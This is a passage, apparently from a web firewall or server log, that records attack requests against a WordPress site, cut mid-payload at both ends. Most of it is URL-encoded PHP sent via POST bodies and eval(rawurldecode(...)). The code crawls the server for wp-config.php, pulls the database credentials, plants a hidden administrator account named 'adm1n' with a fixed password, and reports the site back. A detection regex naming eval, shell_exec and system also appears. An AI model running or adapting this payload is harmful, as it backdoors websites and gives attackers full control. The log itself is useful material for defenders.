0%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-admin\/site-health.php HTTP\/1.1\ncookie:4=3a8677dc156d672c6e12f16237adcc36; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvrUVvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWypKIyp3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nhost:dewenlabels.com\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/101.0.4951.67 Safari\/537.36\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"101\", \"Google Chrome\";v=\"101\"\nsec-ch-ua-mobile:?0\nsec-ch-ua-platform:\"Windows\"\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-site:none\ncontent-length:12640\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nxr=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:11:52","213.209.159.254","POST","\/wp-includes\/html-api\/class-wp-html-token.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> etswnK:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%2